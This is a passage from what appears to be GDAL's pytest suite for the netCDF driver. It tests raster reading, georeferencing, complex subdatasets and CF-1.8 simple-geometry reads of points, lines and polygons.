# ticket #5950: optimize IReadBlock() and CheckData() handling of partial
# blocks in the x axischeck for partial block reading.
def test_netcdf_67():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
try:
import numpy
except ImportError:
pytest.skip()
# disable bottom-up mode to use the real file's blocks size
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', 'NO')
# for the moment the next test using check_stat does not work, seems like
# the last pixel (9) of the image is not handled by stats...
# tst = gdaltest.GDALTest( 'NetCDF', 'partial_block_ticket5950.nc', 1, 45 )
# result = tst.testOpen( check_stat=(1, 9, 5, 2.582) )
# so for the moment compare the full image
ds = gdal.Open('data/partial_block_ticket5950.nc', gdal.GA_ReadOnly)
ref = numpy.arange(1, 10).reshape((3, 3))
if not numpy.array_equal(ds.GetRasterBand(1).ReadAsArray(), ref):
pytest.fail()
ds = None
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', None)
###############################################################################
# Test reading SRS from srid attribute (#6613)
def test_netcdf_68():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/srid.nc')
wkt = ds.GetProjectionRef()
assert '6933' in wkt
###############################################################################
# Test opening a dataset with a 1D variable with 0 record (#6645)
def test_netcdf_69():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/test6645.nc')
assert ds is not None
###############################################################################
# Test that we don't erroneously identify non-longitude axis as longitude (#6759)
def test_netcdf_70():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/test6759.nc')
gt = ds.GetGeoTransform()
expected_gt = [304250.0, 250.0, 0.0, 4952500.0, 0.0, -250.0]
assert max(abs(gt[i] - expected_gt[i]) for i in range(6)) <= 1e-3
###############################################################################
# Test that we take into account x and y offset and scaling
# (https://github.com/OSGeo/gdal/pull/200)
def test_netcdf_71():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/test_coord_scale_offset.nc')
gt = ds.GetGeoTransform()
expected_gt = (-690769.999174516, 1015.8812500000931, 0.0, 2040932.1838741193, 0.0, 1015.8812499996275)
assert max(abs(gt[i] - expected_gt[i]) for i in range(6)) <= 1e-3
###############################################################################
# test int64 attributes / dim
def test_netcdf_72():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = gdal.Open('data/int64dim.nc')
mdi = ds.GetRasterBand(1).GetMetadataItem('NETCDF_DIM_TIME')
assert mdi == '123456789012'
###############################################################################
# test geostationary with radian units (https://github.com/OSGeo/gdal/pull/220)
def test_netcdf_73():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/geos_rad.nc')
gt = ds.GetGeoTransform()
expected_gt = (-5979486.362104082, 1087179.4077774752, 0.0, -5979487.123448145, 0.0, 1087179.4077774752)
assert max([abs(gt[i] - expected_gt[i]) for i in range(6)]) <= 1
###############################################################################
# test geostationary with microradian units (https://github.com/OSGeo/gdal/pull/220)
def test_netcdf_74():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/geos_microradian.nc')
gt = ds.GetGeoTransform()
expected_gt = (-5739675.119757546, 615630.8078590936, 0.0, -1032263.7666924844, 0.0, 615630.8078590936)
assert max([abs(gt[i] - expected_gt[i]) for i in range(6)]) <= 1
###############################################################################
# test opening a ncdump file
def test_netcdf_75():
if gdaltest.netcdf_drv is None:
pytest.skip()
if gdaltest.netcdf_drv.GetMetadataItem("ENABLE_NCDUMP") != 'YES':
pytest.skip()
tst = gdaltest.GDALTest('NetCDF', 'byte.nc.txt',
1, 4672)
wkt = """PROJCS["NAD27 / UTM zone 11N",
GEOGCS["NAD27",
DATUM["North_American_Datum_1927",
SPHEROID["Clarke 1866",6378206.4,294.9786982139006,
AUTHORITY["EPSG","7008"]],
AUTHORITY["EPSG","6267"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4267"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",-117],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AUTHORITY["EPSG","26711"]]"""
return tst.testOpen(check_prj=wkt)
###############################################################################
# test opening a vector ncdump file
def test_netcdf_76():
if gdaltest.netcdf_drv is None:
pytest.skip()
if gdaltest.netcdf_drv.GetMetadataItem("ENABLE_NCDUMP") != 'YES':
pytest.skip()
ds = ogr.Open('data/poly.nc.txt')
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if f is None or f.GetGeometryRef() is None:
f.DumpReadable()
pytest.fail()
###############################################################################
# test opening a raster file that used to be confused with a vector file (#6974)
def test_netcdf_77():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/fake_Oa01_radiance.nc')
subdatasets = ds.GetMetadata('SUBDATASETS')
assert len(subdatasets) == 2 * 2
ds = gdal.Open('NETCDF:"data/fake_Oa01_radiance.nc":Oa01_radiance')
assert not ds.GetMetadata('GEOLOCATION')
###############################################################################
# test we handle correctly valid_range={0,255} for a byte dataset with
# negative nodata value
def test_netcdf_78():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/byte_with_valid_range.nc')
assert ds.GetRasterBand(1).GetNoDataValue() == 240
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('B' * 4, data)
assert data == (128, 129, 126, 127)
###############################################################################
# test we handle correctly _Unsigned="true" for a byte dataset with
# negative nodata value
def test_netcdf_79():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/byte_with_neg_fillvalue_and_unsigned_hint.nc')
assert ds.GetRasterBand(1).GetNoDataValue() == 240
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('B' * 4, data)
assert data == (128, 129, 126, 127)
###############################################################################
# Test creating and opening with accent
def test_netcdf_80():
if gdaltest.netcdf_drv is None:
pytest.skip()
test = gdaltest.GDALTest('NETCDF', '../data/byte.tif', 1, 4672)
return test.testCreateCopy(new_filename='test\xc3\xa9.nc', check_gt=0, check_srs=0, check_minmax=0)
###############################################################################
# netCDF file in rotated_pole projection
def test_netcdf_81():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/rotated_pole.nc')
assert ds.RasterXSize == 137 and ds.RasterYSize == 108, \
'Did not get expected dimensions'
projection = ds.GetProjectionRef()
expected_projection = """PROJCS["unnamed",GEOGCS["unknown",DATUM["unnamed",SPHEROID["Spheroid",6367470,594.313048347956]],PRIMEM["Greenwich",0],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]]],PROJECTION["Rotated_pole"],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],EXTENSION["PROJ4","+proj=ob_tran +o_proj=longlat +lon_0=18 +o_lon_p=0 +o_lat_p=39.25 +a=6367470 +b=6367470 +to_meter=0.0174532925199 +wktext"]]"""
assert projection == expected_projection, 'Did not get expected projection'
gt = ds.GetGeoTransform()
expected_gt = (-35.47, 0.44, 0.0, 23.65, 0.0, -0.44)
assert max([abs(gt[i] - expected_gt[i]) for i in range(6)]) <= 1e-3, \
'Did not get expected geotransform'
###############################################################################
# netCDF file with extra dimensions that are oddly indexed (1D variable
# corresponding to the dimension but with a different name, no corresponding
# 1D variable, several corresponding variables)
def test_netcdf_82():
if gdaltest.netcdf_drv is None:
pytest.skip()
with gdaltest.error_handler():
ds = gdal.Open('data/oddly_indexed_extra_dims.nc')
md = ds.GetMetadata()
expected_md = {
'NETCDF_DIM_extra_dim_with_var_of_different_name_VALUES': '{100,200}',
'NETCDF_DIM_EXTRA': '{extra_dim_with_several_variables,extra_dim_without_variable,extra_dim_with_var_of_different_name}',
'x#standard_name': 'projection_x_coordinate',
'NC_GLOBAL#Conventions': 'CF-1.5',
'y#standard_name': 'projection_y_coordinate',
'NETCDF_DIM_extra_dim_with_var_of_different_name_DEF': '{2,6}'
}
assert md == expected_md, 'Did not get expected metadata'
md = ds.GetRasterBand(1).GetMetadata()
expected_md = {
'NETCDF_DIM_extra_dim_with_several_variables': '1',
'NETCDF_DIM_extra_dim_with_var_of_different_name': '100',
'NETCDF_DIM_extra_dim_without_variable': '1',
'NETCDF_VARNAME': 'data'
}
assert md == expected_md, 'Did not get expected metadata'
###############################################################################
# Test complex data subsets
def test_netcdf_83():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/complex.nc')
sds_list = ds.GetMetadata('SUBDATASETS')
assert len(sds_list) == 6, 'Did not get expected complex subdataset count.'
assert sds_list['SUBDATASET_1_NAME'] == 'NETCDF:"data/complex.nc":f32' and sds_list['SUBDATASET_2_NAME'] == 'NETCDF:"data/complex.nc":f64' and sds_list['SUBDATASET_3_NAME'] == 'NETCDF:"data/complex.nc":/group/fmul', \
'did not get expected subdatasets.'
ds = None
assert not gdaltest.is_file_open('data/complex.nc'), 'file still opened.'
###############################################################################
# Confirm complex subset data access and checksum
# Start with Float32
def test_netcdf_84():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('NETCDF:"data/complex.nc":f32')
assert ds.GetRasterBand(1).DataType == gdal.GDT_CFloat32
cs = ds.GetRasterBand(1).Checksum()
assert cs == 523, 'did not get expected checksum'
# Repeat for Float64
def test_netcdf_85():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('NETCDF:"data/complex.nc":f64')
assert ds.GetRasterBand(1).DataType == gdal.GDT_CFloat64
cs = ds.GetRasterBand(1).Checksum()
assert cs == 511, 'did not get expected checksum'
# Check for groups support
def test_netcdf_86():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('NETCDF:"data/complex.nc":/group/fmul')
assert ds.GetRasterBand(1).DataType == gdal.GDT_CFloat32
cs = ds.GetRasterBand(1).Checksum()
assert cs == 453, 'did not get expected checksum for band 1'
cs = ds.GetRasterBand(2).Checksum()
assert cs == 629, 'did not get expected checksum for band 2'
cs = ds.GetRasterBand(3).Checksum()
assert cs == 473, 'did not get expected checksum for band 3'
###############################################################################
def test_netcdf_uffd():
if gdaltest.netcdf_drv is None:
pytest.skip()
if uffd_compare('orog_CRCM1.nc') is None:
pytest.skip()
netcdf_files = [
'orog_CRCM1.nc',
'orog_CRCM2.nc',
'cf-bug636.nc',
'bug636.nc',
'rotated_pole.nc',
'reduce-cgcms.nc'
]
for netcdf_file in netcdf_files:
assert uffd_compare(netcdf_file) is True
###############################################################################
# netCDF file containing both rasters and vectors
def test_netcdf_mixed_raster_vector():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('NETCDF:data/nc_mixed_raster_vector.nc:Band1')
assert ds.GetRasterBand(1).Checksum() == 4672
ds = ogr.Open('data/nc_mixed_raster_vector.nc')
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
assert f['PRFEDEA'] == '35043411'
###############################################################################
# Test opening a file with an empty double attribute
# https://github.com/OSGeo/gdal/issues/1303
def test_netcdf_open_empty_double_attr():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/empty_double_attr.nc')
assert ds
###############################################################################
# Test writing and reading a file with huge block size
def test_netcdf_huge_block_size():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.run_slow_tests():
pytest.skip()
if sys.maxsize < 2**32:
pytest.skip('Test not available on 32 bit')
import psutil
if psutil.virtual_memory().available < 2 * 50000 * 50000:
pytest.skip("Not enough virtual memory available")
tmpfilename = 'tmp/test_netcdf_huge_block_size.nc'
with gdaltest.SetCacheMax(50000 * 50000 + 100000):
with gdaltest.config_option('BLOCKYSIZE', '50000'):
gdal.Translate(tmpfilename,
'../gcore/data/byte.tif',
options='-f netCDF -outsize 50000 50000 -co WRITE_BOTTOMUP=NO -co COMPRESS=DEFLATE -co FORMAT=NC4')
ds = gdal.Open(tmpfilename)
data = ds.ReadRaster(0, 0, ds.RasterXSize, ds.RasterYSize, buf_xsize = 20, buf_ysize = 20)
assert data
ref_ds = gdal.Open('../gcore/data/byte.tif')
assert data == ref_ds.ReadRaster()
ds = None
gdal.Unlink(tmpfilename)
###############################################################################
# Test reading a netCDF file whose fastest varying dimension is Latitude, and
# slowest one is Longitude
# https://lists.osgeo.org/pipermail/gdal-dev/2019-March/049931.html
# Currently we expose it in a 'raw' way, but make sure that geotransform and
# geoloc arrays reflect the georeferencing correctly
def test_netcdf_swapped_x_y_dimension():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/swapedxy.nc')
assert ds.RasterXSize == 4
assert ds.RasterYSize == 8
assert ds.GetGeoTransform() == (90.0, -45.0, 0, -180, 0.0, 45.0)
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('h' * 4 * 8, data)
assert data == (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 ,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31)
md = ds.GetMetadata('GEOLOCATION')
assert md == {
'LINE_OFFSET': '0',
'X_DATASET': 'NETCDF:"data/swapedxy.nc":Latitude',
'SWAP_XY': 'YES',
'PIXEL_STEP': '1',
'SRS': 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]',
'PIXEL_OFFSET': '0',
'X_BAND': '1',
'LINE_STEP': '1',
'Y_DATASET': 'NETCDF:"data/swapedxy.nc":Longitude',
'Y_BAND': '1'}, md
ds = gdal.Open(md['X_DATASET'])
assert ds.RasterXSize == 4
assert ds.RasterYSize == 1
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('f' * 4, data)
assert data == (67.5, 22.5, -22.5, -67.5)
ds = gdal.Open(md['Y_DATASET'])
assert ds.RasterXSize == 8
assert ds.RasterYSize == 1
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('f' * 8, data)
assert data == (-157.5, -112.5, -67.5, -22.5, 22.5, 67.5, 112.5, 157.5)
ds = gdal.Warp('', 'data/swapedxy.nc', options = '-f MEM -geoloc')
assert ds.RasterXSize == 8
assert ds.RasterYSize == 4
assert ds.GetGeoTransform() == (-157.5, 38.3161193233344, 0.0, 67.5, 0.0, -38.3161193233344)
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('h' * 4 * 8, data)
# not exactly the transposed aray, but not so far
assert data == (4, 8, 8, 12, 16, 20, 20, 24, 5, 9, 9, 13, 17, 21, 21, 25, 6, 10, 10, 14, 18, 22, 22, 26, 7, 11, 11, 15, 19, 23, 23, 27)
###############################################################################
# Test reading a netCDF file whose grid_mapping attribute uses an
# expanded form
def test_netcdf_expanded_form_of_grid_mapping():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/expanded_form_of_grid_mapping.nc')
wkt = ds.GetProjectionRef()
assert 'Transverse_Mercator' in wkt
###############################################################################
###############################################################################
# main tests list
###############################################################################
# basic file creation tests
init_list = [
('byte.tif', 4672, []),
('byte_signed.tif', 4672, ['PIXELTYPE=SIGNEDBYTE']),
('int16.tif', 4672, []),
('int32.tif', 4672, []),
('float32.tif', 4672, []),
('float64.tif', 4672, [])
]
# Some tests we don't need to do for each type.
@pytest.mark.parametrize(
'testfunction', [
'testSetGeoTransform',
'testSetProjection',
# SetMetadata() not supported
# 'testSetMetadata'
]
)
@pytest.mark.require_driver('netcdf')
def test_netcdf_functions_1(testfunction):
ut = gdaltest.GDALTest('netcdf', 'byte.tif', 1, 4672, options=["GEOMETRY_ENCODING=WKT"])
getattr(ut, testfunction)()
# Others we do for each pixel type.
@pytest.mark.parametrize(
'filename,checksum,options',
init_list,
ids=[tup[0].split('.')[0] for tup in init_list],
)
@pytest.mark.parametrize(
'testfunction', [
'testCreateCopy',
'testCreate',
'testSetNoDataValue'
]
)
@pytest.mark.require_driver('netcdf')
def test_netcdf_functions_2(filename, checksum, options, testfunction):
ut = gdaltest.GDALTest('netcdf', filename, 1, checksum, options=options)
getattr(ut, testfunction)()
###############################################################################
# simple geometry tests
# basic tests
def test_bad_cf1_8():
# basic resilience test, make sure it can exit "gracefully"
# if not it will abort all tests
bad_geometry = ogr.Open("data/netcdf-sg/no_geometry_type.nc")
bad_feature = ogr.Open("data/netcdf-sg/bad_feature_test.nc")
missing_node_counts_test = ogr.Open("data/netcdf-sg/missing_node_counts_test.nc")
uneq_x_y = ogr.Open("data/netcdf-sg/unequal_xy.nc")
corrupt_poly_1 = ogr.Open("data/netcdf-sg/corrupted_polygon_ncpncir.nc")
corrupt_poly_2 = ogr.Open("data/netcdf-sg/corrupted_polygon_pnc.nc")
corrupt_poly_3 = ogr.Open("data/netcdf-sg/corrupted_polygon_ir.nc")
# error IS fatal
assert(bad_geometry is None)
assert(bad_feature is None)
assert(missing_node_counts_test is None)
assert(corrupt_poly_1 is None)
assert(corrupt_poly_2 is None)
assert(corrupt_poly_3 is None)
assert(uneq_x_y is None)
def test_point_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
singleton_pt = ogr.Open("data/netcdf-sg/point_test.nc")
lc = singleton_pt.GetLayerCount()
assert(lc == 1)
layer = singleton_pt.GetLayerByName("names_geometry")
assert(layer != None)
# Test each geometry directly
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (1 -1)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (2 -2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (3 -3)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (5 -5)")
def test_point3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
singleton_pt = ogr.Open("data/netcdf-sg/point3D_test.nc")
lc = singleton_pt.GetLayerCount()
assert(lc == 1)
layer = singleton_pt.GetLayerByName("names_geometry")
assert(layer != None)
# Test each geometry directly
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (1 -1 1)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (2 -2 -2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (3 -3 3)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (4 -4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (5 -5 5)")
def test_multipoint_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multipoints = ogr.Open("data/netcdf-sg/multipoint_test.nc")
assert(multipoints != None)
lc = multipoints.GetLayerCount()
assert(lc == 1)
layer = multipoints.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (1 -1,2 -2,3 -3,4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (5 -5,6 -6,7 -7,8 -8)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (9 -9,10 -10,-1 1,-2 2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-3 3,-4 4,-5 5,-6 6)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-7 7,-8 8,-9 9,-10 10)")
def test_multipoint3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multipoints = ogr.Open("data/netcdf-sg/multipoint3D_test.nc")
assert(multipoints != None)
lc = multipoints.GetLayerCount()
assert(lc == 1)
layer = multipoints.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (1 -1 1,2 -2 -2,3 -3 3,4 -4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (5 -5 5,6 -6 -6,7 -7 7,8 -8 -8)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (9 -9 9,10 -10 -10,-1 1 -1,-2 2 2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-3 3 -3,-4 4 4,-5 5 -5,-6 6 6)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-7 7 -7,-8 8 8,-9 9 -9,-10 10 10)")
def test_line_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
line = ogr.Open("data/netcdf-sg/line_test.nc")
assert(line != None)
lc = line.GetLayerCount()
assert(lc == 1)
layer = line.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (1 -1,2 -2,3 -3,4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (5 -5,6 -6,7 -7,8 -8)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (9 -9,10 -10,-1 1,-2 2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (-3 3,-4 4,-5 5,-6 6)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (-7 7,-8 8,-9 9,-10 10)")
def test_line3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
line = ogr.Open("data/netcdf-sg/line3D_test.nc")
assert(line != None)
lc = line.GetLayerCount()
assert(lc == 1)
layer = line.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (1 -1 1,2 -2 -2,3 -3 3,4 -4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (5 -5 5,6 -6 -6,7 -7 7,8 -8 -8)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (9 -9 9,10 -10 -10,-1 1 1,-2 2 -2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (-3 3 3,-4 4 -4,-5 5 5,-6 6 -6)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (-7 7 7,-8 8 -8,-9 9 9,-10 10 -10)")
def test_multiline_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multiline = ogr.Open("data/netcdf-sg/multiline_test.nc")
assert(multiline != None)
lc = multiline.GetLayerCount()
assert(lc == 1)
layer = multiline.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((1 -1),(2 -2,3 -3,4 -4))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((5 -5,6 -6,7 -7,8 -8))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((9 -9,10 -10,-1 1),(-2 2))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((-3 3,-4 4),(-5 5,-6 6))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((-7 7,-8 8,-9 9,-10 10))")
def test_multiline3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multiline = ogr.Open("data/netcdf-sg/multiline3D_test.nc")
assert(multiline != None)
lc = multiline.GetLayerCount()
assert(lc == 1)
layer = multiline.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((1 -1 -1),(2 -2 2,3 -3 -3,4 -4 4))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((5 -5 -5,6 -6 6,7 -7 -7,8 -8 8))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((9 -9 -9,10 -10 10,-1 1 -1),(-2 2 2))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((-3 3 -3,-4 4 4),(-5 5 -5,-6 6 6))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((-7 7 -7,-8 8 8,-9 9 -9,-10 10 10))")
def test_polygon_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
polygon = ogr.Open("data/netcdf-sg/polygon_test.nc")
assert(polygon != None)
lc = polygon.GetLayerCount()
assert(lc == 1)
layer = polygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((0 0,1 0,1 1,0 0))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((3 0,4 0,4 1,3 1,3 0))")
def test_polygon3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
polygon = ogr.Open("data/netcdf-sg/polygon3D_test.nc")
assert(polygon != None)
lc = polygon.GetLayerCount()
assert(lc == 1)
layer = polygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((0 0 1,1 0 2,1 1 2,0 0 1))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((3 0 1,4 0 1,4 1 1,3 1 1,3 0 1))")
def test_multipolygon_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multipolygon = ogr.Open("data/netcdf-sg/multipolygon_test.nc")
assert(multipolygon != None)
lc = multipolygon.GetLayerCount()
assert(lc == 1)
layer = multipolygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
def test_multipolygon3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multipolygon = ogr.Open("data/netcdf-sg/multipolygon3D_test.nc")
assert(multipolygon != None)
lc = multipolygon.GetLayerCount()
assert(lc == 1)
layer = multipolygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOLYGON (((0 0 0,1 0 5,1 1 5,0 0 0)))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
